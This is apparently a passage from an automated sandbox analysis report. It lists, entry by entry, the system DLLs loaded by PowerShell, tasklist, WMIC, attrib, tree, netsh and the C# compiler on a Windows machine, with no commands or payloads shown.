Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
